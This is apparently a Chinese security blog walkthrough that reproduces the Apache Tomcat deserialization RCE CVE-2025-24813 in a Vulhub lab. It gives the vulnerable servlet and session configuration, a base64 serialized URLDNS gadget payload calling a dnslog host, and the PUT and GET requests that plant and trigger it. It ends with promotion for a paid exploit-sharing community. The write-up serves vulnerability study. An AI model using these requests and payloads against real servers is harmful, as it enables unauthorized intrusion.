![[CVE-2025-24813]Tomcat RCE漏洞复现-附检测插件](http://cn-sec.com/wp-content/uploads/2025/03/5-1742881474.png "[CVE-2025-24813]Tomcat RCE漏洞复现-附检测插件")
扫码加内部知识圈
获取漏洞资料
Vulhub靶场复现:Tomcat远程代码执行漏洞(CVE-2025-24813),附检测插件
靶场地址如下,还是热乎的:
https://github.com/vulhub/vulhub/tree/master/tomcat/CVE-2025-24813![[CVE-2025-24813]Tomcat RCE漏洞复现-附检测插件](http://cn-sec.com/wp-content/uploads/2025/03/7-1742881475.png "[CVE-2025-24813]Tomcat RCE漏洞复现-附检测插件")
漏洞详情
Apache Tomcat 是一个广泛使用的开源Java Servlet、JavaServer Pages、Java Expression Language和WebSocket技术的实现。
在 Tomcat 版本 9.x ~ 9.0.97,10.x ~ 10.1.34, 11.x ~ 11.0.2 中,当 Tomcat 同时配置了可写的 DefaultServlet(readonly=false)和基于文件的会话持久化时,攻击者可以向服务器写入任意文件,并通过操作 JSESSIONID cookie 触发这些文件的反序列化,最终导致远程代码执行。
<servlet><servlet-name>default</servlet-name><servlet-class>org.apache.catalina.servlets.DefaultServlet</servlet-class><init-param><param-name>debug</param-name><param-value>0</param-value></init-param><init-param><param-name>listings</param-name><param-value>false</param-value></init-param><init-param><param-name>readonly</param-name><param-value>false</param-value></init-param><load-on-startup>1</load-on-startup></servlet>
其次,Tomcat配置了基于文件的Session持久化:
<ManagerclassName="org.apache.catalina.session.PersistentManager"><StoreclassName="org.apache.catalina.session.FileStore"/></Manager>
这两种配置都使用相同的默认存储路径:
$CATALINA_BASE/work/Catalina/localhost/ROOT当发送不完全的PUT请求(使用Content-Range头)时,Tomcat会将文件路径中的分隔符(/)转换为句点(.),并将文件临时存储在会话存储目录中。利用这个特效,我们可以将恶意序列化对象写入此临时文件中。
正文开始
把环境启动起来,首页如下图
![[CVE-2025-24813]Tomcat RCE漏洞复现-附检测插件](http://cn-sec.com/wp-content/uploads/2025/03/5-1742881476.png "[CVE-2025-24813]Tomcat RCE漏洞复现-附检测插件")
这里尝试利用URLDNS gadget类打dnslog
![[CVE-2025-24813]Tomcat RCE漏洞复现-附检测插件](http://cn-sec.com/wp-content/uploads/2025/03/5-1742881477.png "[CVE-2025-24813]Tomcat RCE漏洞复现-附检测插件")
生成base64格式的序列化利用链
rO0ABXNyACLBqsGhwbbBocCuwbXBtMGpwazArsGIwaHBs8GowY3BocGwBQfawcMWYNEDAAJGABTBrMGvwaHBpMGGwaHBo8G0wa/BskkAEsG0wajBssGlwbPBqMGvwazBpHhwP0AAAAAAAAx3CAAAABAAAAABc3IAGMGqwaHBtsGhwK7BrsGlwbTArsGVwZLBjJYlNzYa/ORyAwAHSQAQwajBocGzwajBg8GvwaTBpUkACMGwwa/BssG0TAASwaHBtcG0wajBr8GywanBtMG5dAAkwYzBqsGhwbbBocCvwazBocGuwafAr8GTwbTBssGpwa7Bp8C7TAAIwabBqcGswaVxAH4AA0wACMGowa/Bs8G0cQB+AANMABDBsMGywa/BtMGvwaPBr8GscQB+AANMAAbBssGlwaZxAH4AA3hw//////////90ACbBqcGnwa7BtsG5wbPBssGrwbbBosCuwaTBp8GywajAs8CuwaPBrnQAAHEAfgAFdAAIwajBtMG0wbBweHQANMGowbTBtMGwwLrAr8CvwanBp8GuwbbBucGzwbLBq8G2waLArsGkwafBssGowLPArsGjwa54![[CVE-2025-24813]Tomcat RCE漏洞复现-附检测插件](http://cn-sec.com/wp-content/uploads/2025/03/7-1742881478.png "[CVE-2025-24813]Tomcat RCE漏洞复现-附检测插件")
PUT /deserialize/session HTTP/1.1Host: 192.168.172.131:8080Content-Length: 1234Content-Range: bytes 0-5/10{{base64dec(rO0ABXNyACLBqsGhwbbBocCuwbXBtMGpwazArsGIwaHBs8GowY3BocGwBQfawcMWYNEDAAJGABTBrMGvwaHBpMGGwaHBo8G0wa/BskkAEsG0wajBssGlwbPBqMGvwazBpHhwP0AAAAAAAAx3CAAAABAAAAABc3IAGMGqwaHBtsGhwK7BrsGlwbTArsGVwZLBjJYlNzYa/ORyAwAHSQAQwajBocGzwajBg8GvwaTBpUkACMGwwa/BssG0TAASwaHBtcG0wajBr8GywanBtMG5dAAkwYzBqsGhwbbBocCvwazBocGuwafAr8GTwbTBssGpwa7Bp8C7TAAIwabBqcGswaVxAH4AA0wACMGowa/Bs8G0cQB+AANMABDBsMGywa/BtMGvwaPBr8GscQB+AANMAAbBssGlwaZxAH4AA3hw//////////90ACbBqcGnwa7BtsG5wbPBssGrwbbBosCuwaTBp8GywajAs8CuwaPBrnQAAHEAfgAFdAAIwajBtMG0wbBweHQANMGowbTBtMGwwLrAr8CvwanBp8GuwbbBucGzwbLBq8G2waLArsGkwafBssGowLPArsGjwa54)}}
![[CVE-2025-24813]Tomcat RCE漏洞复现-附检测插件](http://cn-sec.com/wp-content/uploads/2025/03/3-1742881479.png "[CVE-2025-24813]Tomcat RCE漏洞复现-附检测插件")
![[CVE-2025-24813]Tomcat RCE漏洞复现-附检测插件](http://cn-sec.com/wp-content/uploads/2025/03/8-1742881480.png "[CVE-2025-24813]Tomcat RCE漏洞复现-附检测插件")
GET / HTTP/1.1Host: 192.168.172.131:8080Cookie: JSESSIONID=.deserialize
![[CVE-2025-24813]Tomcat RCE漏洞复现-附检测插件](http://cn-sec.com/wp-content/uploads/2025/03/10-1742881482.png "[CVE-2025-24813]Tomcat RCE漏洞复现-附检测插件")
![[CVE-2025-24813]Tomcat RCE漏洞复现-附检测插件](http://cn-sec.com/wp-content/uploads/2025/03/0-1742881483.png "[CVE-2025-24813]Tomcat RCE漏洞复现-附检测插件")
![[CVE-2025-24813]Tomcat RCE漏洞复现-附检测插件](http://cn-sec.com/wp-content/uploads/2025/03/10-1742881484.png "[CVE-2025-24813]Tomcat RCE漏洞复现-附检测插件")
![[CVE-2025-24813]Tomcat RCE漏洞复现-附检测插件](http://cn-sec.com/wp-content/uploads/2025/03/4-1742881484.png "[CVE-2025-24813]Tomcat RCE漏洞复现-附检测插件")
内部知识圈子1周年啦!最后6天优惠!
![[CVE-2025-24813]Tomcat RCE漏洞复现-附检测插件](http://cn-sec.com/wp-content/uploads/2025/03/5-1742881484.png "[CVE-2025-24813]Tomcat RCE漏洞复现-附检测插件")
渗透实战、src挖掘文档、漏洞poc、漏洞利用工具等尽在内部圈子社区【安全渗透感知大家族】
01 内部社区
![[CVE-2025-24813]Tomcat RCE漏洞复现-附检测插件](http://cn-sec.com/wp-content/uploads/2025/03/1-1742881484.png "[CVE-2025-24813]Tomcat RCE漏洞复现-附检测插件")
![[CVE-2025-24813]Tomcat RCE漏洞复现-附检测插件](http://cn-sec.com/wp-content/uploads/2025/03/1-1742881484-1.png "[CVE-2025-24813]Tomcat RCE漏洞复现-附检测插件")
![[CVE-2025-24813]Tomcat RCE漏洞复现-附检测插件](http://cn-sec.com/wp-content/uploads/2025/03/8-1742881485.png "[CVE-2025-24813]Tomcat RCE漏洞复现-附检测插件")
02 内部社区
![[CVE-2025-24813]Tomcat RCE漏洞复现-附检测插件](http://cn-sec.com/wp-content/uploads/2025/03/7-1742881485.png "[CVE-2025-24813]Tomcat RCE漏洞复现-附检测插件")
![[CVE-2025-24813]Tomcat RCE漏洞复现-附检测插件](http://cn-sec.com/wp-content/uploads/2025/03/0-1742881486.png "[CVE-2025-24813]Tomcat RCE漏洞复现-附检测插件")
![[CVE-2025-24813]Tomcat RCE漏洞复现-附检测插件](http://cn-sec.com/wp-content/uploads/2025/03/5-1742881486.png "[CVE-2025-24813]Tomcat RCE漏洞复现-附检测插件")
C4安全团队公开交流群
![[CVE-2025-24813]Tomcat RCE漏洞复现-附检测插件](http://cn-sec.com/wp-content/uploads/2025/03/3-1742881486.png "[CVE-2025-24813]Tomcat RCE漏洞复现-附检测插件")
![[CVE-2025-24813]Tomcat RCE漏洞复现-附检测插件](http://cn-sec.com/wp-content/uploads/2025/03/7-1742881487.jpeg "[CVE-2025-24813]Tomcat RCE漏洞复现-附检测插件")
END
关注Code4th安全团队
了解更多网络安全内容~
原文始发于微信公众号(C4安全团队):[CVE-2025-24813]Tomcat RCE漏洞复现-附检测插件
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论